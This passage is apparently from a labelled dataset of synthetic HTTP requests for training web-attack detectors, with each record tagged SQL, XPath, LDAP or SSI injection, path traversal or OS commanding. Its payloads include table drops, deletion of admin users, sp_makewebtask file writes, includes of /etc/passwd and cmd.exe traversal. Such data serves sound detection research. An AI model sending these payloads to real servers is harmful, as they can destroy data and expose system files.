UA-Disp: 944,674,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 232x1783
Via: HTTP/1.8 74.130.197.3, 7.2 73.243.240.163, FTP/2.9 121.142.76.179
Transfer-Encoding: compress
Upgrade: mew/8.4, w3bv/8.4, ttttf/6.4, ua5/6.2
Warning: 780 www.pSzaM.htm:09 "rooshxoYosit" "Sat, 18 Nov 06 04:55:06 CET"
X-Forwarded-For: 145.74.246.159
X-Serial-Number: 51873709956197
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36773
Start - Id: 49117
class: XPathInjection
GET /xxmlqL.5MG9o46mailL-/oU7NQ4/144nN5EUwt/7L4copyMooEmVIHB23/Mrm/tOmabhy8kNomiyd/a2esslthnb2/02w3.@dxU_R/mpXPo8uf-Az3/sauXsbb74l5dhmeec.html?ABSAiA4GvV=%3D&mGinputg=3787++++or++++nE%2Fitr%2Fihur%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D35%5D+++or++84%3D HTTP/1.0
Host: 148.35.112.254
Connection: close
Accept: application/x-tar;q=0.9, text/*
Accept-Charset: us-ascii;q=0.3, x-mac-korean, iso-8859-7;q=0.5, cp-950
Accept-Encoding: gzip, gzip, compress;q=0.1, identity, gzip;q=0.4
Accept-Language: *
Cache-Control: max-stale=86
Client-ip: 140.0.134.125
Cookie: leda8oige6=2ad5trtaau;e6h3lawur=es;dotghmno=dT
Cookie2: $Version="259"
Date: Thu, 16 Sep 04 10:16:17 UTC
ETag: W/"xDd@V.0G-HbolXW"
Expect: htduh=nedueein;lnyke
From: tiaecs@atrtrnsru.ch
If-Modified-Since: Sun, 22 Jul 07 01:17:13 GMT
If-Unmodified-Since: Sat, 02 Apr 05 16:06:36 UTC
If-Match: "fKYBCvbJeO8B1QXb2Q@x"
If-None-Match: *
If-Range: "6IbXyIqqMh60@BPT"
Max-Forwards: 420
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Digest username="lu8nnsh"
Authorization: Basic bXllZW50TzpsaWR1ZWN4bQ==
Range: 1-
Referer: http://ltodk6t.fr/Berpstyr.html
TE: chunked;q=0.3,trailers,deflate;q=0.5
Trailer: Referer
User-Agent: Mozilla/8.3 (Windows; U; Win 9x 1.5; es-tt; rv:7.2.3) Gecko/72707378
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 9298x371
Via: 9.4 105.145.37.4:8818, HTTP/3.1 67.67.54.173, 1.6 www.EasavI.png
Transfer-Encoding: identity
Upgrade: rlace/3.0, hoSa/9.4, jas/6.6, iAeed/2.7
Warning: 856 173.35.211.19 "ihersc3ga8taanoissh" 
X-Forwarded-For: 130.41.59.128
X-Serial-Number: 68685203672775561
----: -------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 49117
Start - Id: 42775
class: SqlInjection
POST /l9acceptppositioncvhU8u/AlSe/rKdJdkqh.q/KCC91/cBcSdelete3GfromselectnoG8dp/9YtG55@Caj2M/ejq_4WG3/Fconnect-K0GmJepHx0LO/vaDJ9366/Enrentdctrd1eE/ekdsboccLSs.asmx? HTTP/1.0
Content-Length: 12
Content-Language: un,S
Content-Encoding: deflate
Content-Location: http://www.ss1se2ls.org/enshs/hsdk/v4za8.mp3
Content-MD5: bnJxSW5lNnNocXIwc29uZw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 04 Jan 09 09:21:12 CET
Last-Modified: Sat, 26 Jan 08 24:56:23 GMT
Host: 22.41.3.62
Connection: close
Accept: */*;q=0.7
Accept-Charset: iso-2022-jp, iso-8859-1
Accept-Encoding: compress;q=0.3, deflate, compress, identity, gzip;q=0.5
Accept-Language: h7-lvanls, o-eimas;q=0.2, 3Oeletp-siaotk;q=0.5, rGToo-l2e;q=0.2
Cache-Control: only-if-cached
Client-ip: 123.132.14.48
Cookie: ih3rndI=';     drop     table   TuOsei1n
Cookie2: $Version="74"
Date: Sat, 27 Dec 08 21:05:12 GMT
ETag: "WF4A4@FXbzWEO3h-"
Expect: le7n
If-Modified-Since: Wed, 06 Jan 10 02:51:58 GMT
If-Unmodified-Since: Fri, 14 Sep 07 12:11:28 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 12 Jun 09 01:03:40 CET
Max-Forwards: 308
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: 1oi2hy rTepl=hneaC
Authorization: Basic aHBjcjRhYTpvdWVv
Range: 169067-0
Referer: http://www.dellaA6u.ch/mdjitn5t/tiam8/mhnocsec/okr5/ssisms.tiff
TE: trailers,trailers,gzip;q=0.7
Trailer: Authorization
User-Agent: Mozilla/8.7 (Windows; U; WinNT 0.0; a2-Et; rv:4.9.1) Gecko/82816076
UA-CPU: PowerPC
UA-OS: Linux
Via: FTP/5.9 249.135.113.171, FTP/1.8 49.36.11.166
Transfer-Encoding: deflate
Upgrade: avqW/1.7, 8id3nt/8.2, ybt/0.5, a8nes/6.6
Warning: 901 www.ooto5.jpg "hxEMfthhileDx" 
X-Serial-Number: 58260161
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Qlhtbniyu=11

End - Id: 42775
Start - Id: 42648
class: SqlInjection
GET /s8J5X6VzI7czdT/sinsioeetguoLce/eeeo0soGa2i/I6cIDmqTabmxinsert/96X/rryLVaU8JVHBzQUr/gIVrU.js?Ys0DeJnre=gohNiMNCO0&sBq2pY1Y=6884213928&dscriptl_bQD=iOn&mep=2441025276&q6formL8LrqRb0v=%27+++%29%2F**%2FUNIONALL%2F**%2FSELECT%2F**%2F5394%2F**%2FFROM%2F**%2Fdss3%2F**%2FWHERE%2F**%2F%28+%27%27++%3D%27++%2F**%2F HTTP/1.0
Host: www.el8oxbinr5.de
Connection: sDysD
Accept: video/*;q=0.2, image/gif
Accept-Charset: iso-8859-8-i;q=0.7, euc-kr, windows-874, koi8;q=0.1, x-mac-greek
Accept-Encoding: 
Accept-Language: cRslH-em4og, rExrbvih-n, coyntut-eore
Cache-Control: no-cache
Client-ip: 183.138.44.237
Cookie: EnullC1TzJreplaceg=83oM
Cookie2: $Version="2"
Date: Mon, 07 Jul 08 12:27:34 CET
ETag: W/"d99n_-k.LjOX0-pI"
Expect: 100-continue
From: z74ht@xqb9ivEose.gov
If-Modified-Since: Wed, 26 Dec 07 17:20:41 UTC
If-Unmodified-Since: Sun, 22 Feb 04 15:33:12 UTC
If-Match: *
If-None-Match: *
If-Range: "IEn8juBMUOS2xQRK"
Max-Forwards: 764
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: NTLM bW9tc2VkRWh1Y21SbnRPbmJ0ZUNhZXllVGVoMm9lbHRQZ3Vt
Authorization: Digest nonce
Range: -5
Referer: http://www.7eonunih.it/s0sj.php
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/8.0 (X11; U; Linux i386 8.1; 6s-tR; rv:8.5.0) Gecko/23452799
UA-CPU: PowerPC
UA-Disp: 0660,7144,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4720x346
Via: FTP/0.7 136.93.198.77:38
Transfer-Encoding: deflate
Upgrade: eyy/2.8, zqo/4.6, tfea/5.6, tnwsfs/8.5, Iut/4.9
Warning: 577 221.133.112.12 "Eaaers" 
X-Forwarded-For: 251.163.13.200
X-Serial-Number: 81024686129
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 42648
Start - Id: 41703
class: SqlInjection
GET /N.IG.7.shtml?b3sorrata8nt=dAr&ser=rtah57sze&sEznrhqar=i&6ll5O9g4eryqLl=%24dersn%25emochabo%7Ce&eohAa12sot=riT&dmTmanuons=84653&DL6aZgwUecho=itrqa%27+%29%3B+DELETE+FROM++users+++WHERE+upper%28username%29++++%3D++++upper%28++++%27admin&oqb5EhoWntWmU=54083&rn8ionteea7=9yC8vl&Sld=6775&ke3g=eooiAinimphascdee HTTP/1.0
Host: 213.128.99.210:80
Connection: close
Accept: application/*;q=0.5, audio/basic;q=0.4
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: min-fresh=712
Client-ip: 51.187.24.113
Cookie: nertqsnn=648422;mdsiaeoeeyuDid=lc3;FI3xstyleUMsock_streamd= Reo8
Cookie2: $Version="1"
Date: Fri, 23 Apr 04 24:38:30 CET
ETag: "AG5CAg.oj.vm0Whv.Z2"
Expect: nllry
From: nrnG@tfeie8.biz
If-Modified-Since: Wed, 08 Dec 04 11:10:56 GMT
If-Unmodified-Since: Mon, 05 Apr 04 22:02:28 CET
If-Match: *
If-None-Match: *
If-Range: "-KuWBsW5qsrNho.1"
Max-Forwards: 36
MIME-Version: 5.8
Pragma: 3aiyoP8='0nai'
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM bnBzMm90RTlhaTJ0dmhvaHJpZTE3OHJhaW5lbmVkYTBTYW90ZXdhbw==
Range: 864538-4,42725-309719
Referer: /otke/4rnsTCGn/s1ntonvO.css
TE: gzip;q=0.8
Trailer: Trailer
User-Agent: 0m8ceeAlcaess
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 128x875
Via: 4.7 www.ae1s.html:69328
Transfer-Encoding: deflate
Upgrade: Him/6.1, srtana/5.1, 5si/1.9, fHrl2k/2.1
Warning: 763 5.20.25.117 "gmfte7ocbcLWwo" "Thu, 12 Jan 06 05:54:45 UTC"
X-Forwarded-For: 93.102.101.223
X-Serial-Number: 611965021882313
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41703
Start - Id: 40382
class: SSI
GET /rzysrSiaetyd2ohe1/rx5CwiGdtmp9PdH0K/ewgetKci55ihomefselectTZ/canJhmaRepidert.bin?15dFI=mSyr&Nb=%3Dwgett&rIC=03237&5Trr=2&rt=2&ps2hLtinqb=66369724&nyvrtunOuOn=7DM&ItrmeEecwe=lNobNdesjjlncttnuT&8tgl57dnto=ahomed&n5heesv=3484419&wGVESMD89passthruk=2120718&oEhooa=rIEgrRPmyC5&oe2sgrae74hto1=ghotsf9e2T&aFvii=yoch HTTP/1.1
Host: 187.2.30.154
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: min-fresh=62
Client-ip: 188.81.61.187
Cookie: w9aaccept=021010819;nmmto070R=<!--  #include   virtual="c:\winnt\system.ini"     -->
Cookie2: $Version="88"
Date: Mon, 13 Dec 04 07:41:32 CET
ETag: W/"L@8zmOD3K4C16fGqMV"
Expect: 100-continue
From: dptne6in@rAeoeuhbLe.de
If-Modified-Since: Mon, 01 Feb 10 22:36:15 UTC
If-Unmodified-Since: Wed, 08 Jun 05 20:14:46 CET
If-Match: "O8nEurRO7Qo@sHP8RY"
If-None-Match: *
If-Range: Tue, 01 Nov 05 11:33:31 GMT
Max-Forwards: 7
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Basic c0VPdGhmYTpjdG5oYmlhZQ==
Referer: http://LtpNsV.com/e1aw/rLNtozvr.php3
TE: trailers
User-Agent: 9rlobalhap (o2C4o32)
UA-Disp: 480,014,16
UA-OS: Mac OS X
UA-Pixels: 875x640
Via: FTP/1.8 www.etlc.tiff, 0.8 119.63.11.50, cnoiS/0.0 6.80.157.223
Transfer-Encoding: iBuwu; tTrltttW=5RKuiti
Upgrade: Syoe7o/4.1, AGtish/6.5, ly9Vi/6.4, lirnr/1.9
Warning: 921 www.pctelwt.html "39anta" "Tue, 26 Jan 10 12:42:31 GMT"
X-Forwarded-For: 110.153.86.131
X-Serial-Number: 976386691609
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40382
Start - Id: 37125
class: LdapInjection
GET /f8/ljNOR.CSVXO/ed7/s7ezawlrgnoilXh/hoI8arwp9zpneouyree/Tohhw18sadmlURhem/sA52yFlmp0zXiUs5r/CbVstafmtal/liwfeaods/J8scriptMVLlikeE/xe7Yelaeu/rrnsjtyAtlh.sh?hrttrassveara=%7E&cTkn=ta%3Dxohtpassgadminstg9+oshutdownul&pcmaniGem=h%5Dqlocation&w-i6Q7NNW=t%27CeLeessystemrrcp+l6trsnrpasswd&9dlregOaNmr=1569&hsrv=%29%28++%7C+++%28+cn%3D*o%27brien*%29%28mail++++%3D*o+%27brien*+++%29+++&e62tzevd=15145&hu=nC%40%5Btiiaftya HTTP/1.0
Host: 88.179.26.68:80
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1251;q=0.2
Accept-Encoding: 
Accept-Language: pho-wgbdEir8;q=0.5
Cache-Control: no-store
Client-ip: 55.97.57.216
Cookie: 0hnreid=aeeoav2ep0tliohBSc;ssIse6cheteaid=Aorwb77etsasth
Cookie2: $Version="74"
Date: Mon, 13 Feb 06 24:12:17 CET
ETag: "vNIt9YlB_Kqpv93dComl"
Expect: seeuhtcr
From: ke6iat@otEmem.org
If-Modified-Since: Mon, 31 Jul 06 20:06:49 GMT
If-Unmodified-Since: Wed, 02 Aug 06 24:10:05 GMT
If-Match: *
If-None-Match: ".kf_KyC@ctRwzdYhEfrw"
If-Range: Tue, 06 May 08 14:13:30 UTC
Max-Forwards: 4
MIME-Version: 1.9
Pragma: ei1eld7i='hth'
Proxy-Authorization: Basic ZWVKbmI6ZGk1OHI=
Authorization: see9 isegk=eecbta
Range: -5173
Referer: http://www.rane571o.st/estoi7na/hnmeu/2new/ahlhooa/esoU.js
TE: gzip,deflate
Trailer: Accept-Language
User-Agent: 4iAneree
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 617x3755
Via: FTP/1.5 www.Uoscidn.htm, t4li/2.0 202.230.184.254:4
Transfer-Encoding: cEha
Upgrade: tRvc9/2.0
Warning: 985 www.hortt.htm "epvsa7dt6thxel" 
X-Forwarded-For: 251.177.162.12
X-Serial-Number: 4738976742686812
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37125
Start - Id: 45743
class: PathTransversal
GET /YyAR3oX/dXbM1gNEowRkQ/ht5jGB9YDjO/tW8Zfjy/ipNaatwr/9bHqc8goVDfo4S/o87x@LPllFYfkA7hF@/n7BXhmCojah5C.css?Y151=d%3A%5Cwindows%5Cboot.ini&inMeentrtpk=apaerform&elrmnhoysuC=ubpeuwr0To5Tses&Qesaonmtraw4s=raabZ&nN=7219016&rtmqtqolrnarzix=4097&4arruyr6=i7in&pm=gtaht%5CcA%3Einko HTTP/1.1
Host: www.gadamzhlt.ch
Connection: aaek
Accept: audio/x-wav;q=0.5, text/xml;q=0.9
Accept-Charset: windows-1254, iso-8859-8;q=0.1, x-mac-roman, x-mac-greek
Accept-Encoding: gzip;q=0.2
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 90.173.15.184
Cookie: 8ms=62083
Cookie2: $Version="34"
Date: Sat, 25 Oct 08 16:54:21 CET
ETag: W/"MmZYP5uH2Z8Y7FOUG_"
Expect: 100-continue
From: eyebc4et@nriRuu.de
If-Modified-Since: Fri, 14 Apr 06 23:37:42 GMT
If-Unmodified-Since: Sun, 30 Jan 05 22:52:03 UTC
If-Match: "bLbXfUfEmhZKj7Kq3"
If-None-Match: *
If-Range: Mon, 26 Apr 10 04:08:55 GMT
Max-Forwards: 9
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: wptoa ypehsb8=2pbhrh0a
Authorization: NTLM dHJudWdOZGlIbGNwaW5ic0RlaGRobmtzbnhkbG9pcmMxb21laWlUZWxodGt0
Range: -500252,934-3694
Referer: /mdEhsc0d/eeay/yEeej/Tmofetu.rar
TE: gzip;q=0.5,deflate;q=0.0
Trailer: User-Agent
User-Agent: rMFHDQ http://www.ragrs6r.it
UA-CPU: Sparc
UA-Disp: 797,3668,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 979x8035
Via: 6.0 162.59.76.194, 3.0 242.2.206.24, 6.1 www.35tst.shtml
Transfer-Encoding: Iyys; d6endwv=tx0d
Upgrade: e5r/8.9, sadhn/5.0, mdrxl/0.0, i4auie/7.0
Warning: 198 5.109.101.104 "kAoaslle" 
X-Forwarded-For: 187.241.210.252
X-Serial-Number: 82558
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45743
Start - Id: 35059
class: SqlInjection
GET /YC7havingoptaI.F/IUMMJ@scriptNz4zy/0hionSwwoutOmmkacnr/XRphpjlogVIp_n2c/8RGDN/3brzqoUno2dsbymgpwe/een/eoeum16Rmde/2eseoauost/tybozzj5sostTt/u5JP6u85Rp-i-ViD-/eQ.shtml?Qehtpass4XyC19LE.=esMhuuformc%28ns+%27&YUOZ@iL=4514681294&@6lPLnT=650&ctr2eonyruyh3yc=x%5Drsdrhc%7Careo%25res%27&6a=auSnThTJmL&atlstsnUunaetcw=8574&passthruusb=3633182744&urstnNSS=m&LtrvarautoexecK9N=na+%27tcn&2w_-@shutdowntctUMU=%27%3B+++++EXEC+master.dbo.sp_makewebtask+++++%27c%3A%5Cinetpub%5Cwwwroot%5Cee0an.shtml%27%2C+%27SELECT++++ethnuee+FROM++++em+++WHERE+++++xtype%3D%27%27U%27%27%27&tCtRK@Bgv=0535&pnAmp6ynA=rlv3p HTTP/1.1
Host: 233.222.205.73
Connection: H1tgD
Accept: application/x-tar, audio/*, audio/*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 243.80.185.17
Cookie: uetxsnt=8MY
Cookie2: $Version="16"
Date: Wed, 12 Aug 09 17:04:40 CET
ETag: W/"-i8OCTZDs9wjs6139OT"
Expect: 4en1t=spype;iksuo0L=mtJuin
If-Modified-Since: Sun, 15 Jun 08 06:31:07 GMT
If-Unmodified-Since: Tue, 04 Sep 07 22:08:46 CET
If-Match: "9.9F5a9MwmVClUI"
If-None-Match: "Dq4a30R8SBQMWsUr"
If-Range: "8inzUpwYbAcfLTD"
Max-Forwards: 697
MIME-Version: 0.3
Pragma: xiaiiz6=ttr02u
Proxy-Authorization: Basic aFJpQzpidHN1bw==
Authorization: krrco dfih=vprrsol
Range: 478-841920,54-454132
Referer: http://en1t.biz/sLtnn/Igvey/rphlnis6/eh5x.cfm
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
User-Agent: bttsb (fYqHpz)
UA-CPU: 68000
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 989x6143
Via: HTTP/2.6 www.lbtfe.js:08
Transfer-Encoding: deflate
Upgrade: l5i/1.7, lDqw/9.3, ade/1.3, rst/9.9
Warning: 825 www.eezs.png:4813 "dnlyiz8ddawi9eucren" 
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35059
Start - Id: 41680
class: SqlInjection
GET /asploruleH/wzXjl3C-hchjC/rAv.3kVUjgvwHGCXRqt1/cw8V2xycI-x@D/hoojeardtE3/wB/onkc/vs6h/aCT8/OYpRQb-203e3SJS/Eetf/srqp9t.aspx?yVADf=lU&it9nvsa03hamsci=%27+OR++++%27%27++%3D+%27&ast2u=lzt HTTP/1.0
Host: www.Aatzxthe.it
Connection: close
Accept: video/quicktime, application/x-tar, video/*
Accept-Charset: hz-gb-2312, x-mac-arabic
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 31.225.142.110
Cookie: eihren=8639;0j0Ipyh=1522184;23bnp=t-W;8efertr=i7RckUmE.bD
Cookie2: $Version="83"
Date: Mon, 20 Feb 06 23:49:04 GMT
ETag: "qB-FTULONUY7iO2"
Expect: artic
From: wnytdt@bdcjnzt.org
If-Modified-Since: Tue, 26 Oct 04 17:54:07 GMT
If-Unmodified-Since: Mon, 14 May 07 13:40:47 UTC
If-Match: *
If-None-Match: "A9jMPenfjqDAJ@8Pii"
If-Range: *
Max-Forwards: 75
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM bGVkbGpuZW1ucXRsb2JnZWJiZWVmVW0ycGVzbWxpaTRWbVNHeQ==
Authorization: Basic emE4ZXQ6Z2V4YmNz
Range: 3550-,-3
Referer: http://8iitqbom.fr/eYYg/9nrni.cfm
TE: deflate,trailers,chunked;q=0.6
Trailer: Max-Forwards
User-Agent: Mozilla/7.4 (X11; U; Open BSD i586 7.0; ia-ep; rv:2.6.4) Gecko/43046002
UA-CPU: x86
UA-Disp: 1862,8220,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 232x3893
Via: HTTP/9.8 230.23.166.235, FTP/4.4 www.rTd9eze.htm, eurig/4.2 52.151.18.34
Transfer-Encoding: s53hi; n1uyhetA=ewes6aT
Upgrade: dahek/1.1, htct/7.8, rrepda/5.7, eos/3.6, uoe/1.9
Warning: 118 2.156.64.121 "naglietszhgs" 
X-Forwarded-For: 39.208.247.75
X-Serial-Number: 611965021882313
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41680
Start - Id: 45163
class: PathTransversal
GET ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////? HTTP/1.0
Host: 61.189.227.101
Connection: keep-alive
Accept: video/mpeg;q=0.2, text/html, application/rtf;q=0.7
Accept-Charset: x-mac-turkish, iso-8859-6;q=0.8, x-mac-chinesetrad
Accept-Encoding: compress, compress;q=0.9, compress, compress;q=0.0
Accept-Language: Rl-SE;q=0.0
Cache-Control: only-if-cached
Client-ip: 3.86.215.159
Cookie: 4En9T4s=ecat@n'm| ei4bHa;84ihBadminihaving1C=zaxp_script$n;a0ytdyi=eae1rbmDr9a;tHctym=3;EsZjo=562430;JFsg-w.HQZu= lac yaThanaRz
Cookie2: $Version="70"
Date: Sat, 06 Jun 09 22:16:28 CET
ETag: W/"A2GfweKXm_TLmbvnWY"
Expect: 100-continue
From: hdOf9re@eutwEh.uk
If-Modified-Since: Sat, 21 Mar 09 21:05:16 CET
If-Unmodified-Since: Sun, 13 Jul 08 18:52:16 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 02 Oct 06 16:27:43 CET
Max-Forwards: 132
MIME-Version: 3.0
Pragma: upgnwx='vssk'
Proxy-Authorization: Digest uri=/e1iBf/tmad/iteoqSih/EPRw/eq6pop.gif
Authorization: o25ra fbeoarR=nHIiirse
Range: 551-3881,-846
Referer: /aae8Dmuq/eohrawsa.ace
TE: trailers,chunked,trailers
Trailer: Date
User-Agent: Mozilla/5.7 (compatible; rhornchv; SunOS sun4u; ThezcgOF; Lwcsta3)
UA-Disp: 8494,699,8
UA-OS: Win98
UA-Pixels: 1177x8327
Via: FTP/3.1 www.rata.css:321, FTP/1.5 188.72.187.99:795, FTP/6.6 www.ede7.shtml:463
Transfer-Encoding: compress
Upgrade: 7aW/4.1, nTewc/8.8, eenf/6.5, bhs/8.1
Warning: 543 www.sdsds.css "ealt1ar6synhZ" 
X-Forwarded-For: 249.70.128.210
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45163
Start - Id: 39518
class: SSI
GET /srsfnfdutrtdHcereeep.tiff?cdcrsscwg5aeii=9lod2rsyJn&savof3rDTph=ciL6qtr%24+ezwA&aeTcmap=+e4yrtmaildNt%409bu%2B&cJwAliettre5rn=%5B+ac2hiJ+enru&Ime0nnn9enmot85=jawjy&e1egahneisofgtt=gP1z8&aueladahRdf=580&R8dKX1CE3TY=heea6eYah&Wu-opt.uN8=doeaccept%3Axtermr%5Bd+lAeeeto&aqeAieTiisllar=mcopys6%2Bnct%29%3C%25telnetl&4bbytboa=ieankksEkrr1i&oYcs=mj+3&o6njxe=7010707 HTTP/1.1
Host: 147.207.189.109
Connection: close
Accept: */*
Accept-Charset: cp-936;q=0.4, koi8-r;q=0.6
Accept-Encoding: compress
Accept-Language: *;q=0.5
Cookie: h6eooIani=<!--    #include   virtual="/etc/passwd"  -->
Date: Tue, 17 Aug 04 22:34:04 GMT
ETag: W/"WeRrPImoBrnYtxGi@o"
Expect: 100-continue
If-Modified-Since: Thu, 02 Aug 07 23:59:21 UTC
If-Unmodified-Since: Wed, 30 Aug 06 19:44:21 CET
If-Match: "@Pnawz9QMaVZTVou"
If-None-Match: "5XBiRbnU8U0Ks_LRLij2"
If-Range: Sat, 23 Dec 06 18:24:22 UTC
Max-Forwards: 46
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest qop=ioTsdw3n
Authorization: NTLM TmFpbGVvZnRvYmVzb3NodWt3dW9sdEV0d21lZW5ubWFub2Vld3llb2R1c28=
Referer: /ifacee.mspx
TE: trailers,gzip
User-Agent: Mozilla/9.0 (Windows; U; Windows NT 7.7; De-ah; rv:7.6.3) Gecko/16342473
Via: FTP/8.1 www.6n5N.tiff:28
Warning: 366 www.henmfi.html "rAeC0ettnrrcouKnsAu0" "Sun, 26 Nov 06 15:37:32 UTC"
X-Forwarded-For: 81.239.118.138
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39518
Start - Id: 44055
class: OsCommanding
GET .%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.mahoeevai1.biz
Connection: hesoqan
Accept: image/*, audio/*;q=0.6
Accept-Charset: iso-8859-4;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=25162
Client-ip: 11.19.174.55
Cookie: HNN18pincludeO-Aob=65953;dG1P=nen3tyrn;eiso=36492;nibnh=n/ines2atNsh
Cookie2: $Version="43"
Date: Wed, 16 Aug 06 14:50:53 GMT
ETag: "a.HsjY6Z8t76nKz10U"
Expect: 100-continue
From: ctHO@rsrvtl.cz
If-Modified-Since: Thu, 06 Jan 05 22:06:07 CET
If-Unmodified-Since: Tue, 27 Jan 04 20:34:39 UTC
If-Match: *
If-None-Match: "s13nctY9qF1HApl5i0"
If-Range: Fri, 19 Nov 04 23:56:07 GMT
Max-Forwards: 8
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Digest response="fEbfBB7c0E29b479e09d8FeF2679E7e3"
Authorization: osLn 3ee8aia=uEephmnw
Range: -0
Referer: http://www.rhseaoa2.fr/mewig/7YxcS.dll
TE: trailers,chunked
Trailer: If-Range
User-Agent: atew/4.5.6.7.4
UA-CPU: PowerPC
UA-Disp: 6409,6413,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4959x090
Via: HTTP/7.1 15.255.155.128, 5.6 www.5nubSctu.jpg
Transfer-Encoding: compress
Upgrade: tpnTf/6.7, GatRth/6.1, eyss8u/8.0
Warning: 175 26.216.110.35 "tt5rn4Ks" "Fri, 26 May 06 17:19:02 GMT"
X-Forwarded-For: 201.145.60.10
X-Serial-Number: 412280187
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44055
Start - Id: 46078
class: PathTransversal
PUT /tUN.B7-bO@Q/eensreLmnrm8T/1QZ/enohensi1jdg2jsytoa/1VW@5Jedropobject/e8erpa8aiKqUaHnzsebb/ahZd/8KwRLHZRLMi6SdD0/ippinpeF0at/lEQ@J.USW6p@pTJ/dLdAasdOaem3z.shtml? HTTP/1.0
Content-Length: 298
Content-Language: nrda,o6w,9au
Content-Encoding: identity
Content-Location: http://www.2huahnsd.cz/cert/wnsa/e3dijh/nisn.mspx
Content-MD5: dGlFb00zdGlzYTFlcnNQMw==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Tue, 04 Jul 06 22:10:31 GMT
Host: www.esaout6eg.ch
Connection: 9yatt
Accept: image/png
Accept-Charset: x-mac-cyrillic, iso-8859-9, gb2312, x-mac-hebrew
Accept-Encoding: deflate;q=0.3, identity, identity;q=0.3, deflate;q=0.0
Accept-Language: S4ib0b-nfbbs2ve;q=0.5
Cache-Control: max-age=7308
Cookie: L20Gh=72783795;te=srcpeor
Cookie2: $Version="9"
Date: Tue, 09 Jun 09 06:02:31 UTC
Expect: etctA7v=4nygoels
If-Modified-Since: Tue, 25 Jul 06 08:26:26 GMT
If-Unmodified-Since: Sat, 31 Dec 05 13:16:01 UTC
If-Match: "HYBHNWUjCqtD_5z"
If-None-Match: *
If-Range: Mon, 07 Feb 05 15:11:10 CET
Max-Forwards: 3
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NTLM TzJvU281YXN1a2Ficm55U0FhaHR0YWg1bnluYWN0dGVoaXM=
Authorization: 4gdu ennsehb=Neam
Referer: http://www.yDeaph.org/oWemeEr/onga/efeielld/hipeoeo/eot1see.cgi
TE: trailers,trailers
User-Agent: Mozilla/4.8 (X11; U; Unix 5.6; od-ay; rv:0.7.9) Gecko/67532300
Via: 1.3 241.105.230.25, 7.2 31.183.44.61
Transfer-Encoding: deflate
X-Forwarded-For: 169.44.253.54
X-Serial-Number: 3193493640489
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eTnMv53=39&rgO8@jUB3KMT=984819&2BuexecHrbP=re1 TemgtN6w&toRersa=dCz-wuf&Amnhnttsntiebii=76&inonem=525&uE6Z5Hp=dwSEoe&etwa=hPHKxph&rsedtte6=../../../../var/log/access_log%00.html&utp=bf2n~&K7JH=qutjnueoq&Pren=09&iframeoR@.8KE=cZWcB3oW&na0izaTtwOhtdtw=tdocumentre&sgaJU6uIstyleW=on@

End - Id: 46078
Start - Id: 43334
class: OsCommanding
